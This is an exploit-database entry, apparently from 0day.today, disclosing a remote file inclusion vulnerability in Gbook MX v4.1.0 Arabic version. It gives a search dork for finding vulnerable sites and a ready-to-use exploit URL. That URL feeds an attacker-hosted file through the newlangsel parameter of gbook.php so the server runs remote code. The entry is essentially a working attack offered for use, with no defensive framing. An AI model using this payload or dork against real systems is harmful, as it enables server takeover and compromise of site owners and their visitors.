id: 10611
date: 01/04/2010
title: Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability
author: indoushka
cves: 

===========================================================
Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability
===========================================================

========================================================================================                 
| # Title    : Gbook MX v4.1.0 Arabic Version File inclusion Vulnerability                   
| # Author   : indoushka    
| # Total alerts found : 1                                               
|                High  : 1  
| # Dork     : Powered by Gbook MX v4.1.0 ©2003 Magtrb Soft                                  
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : RFI                                                                   
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- RFI
 
http://server/Gbook_mx4.1.0/gbookmx/gbook.php?newlangsel=http://127.0.0.1/c.txt?



#  0day.today [2023-03-22]  #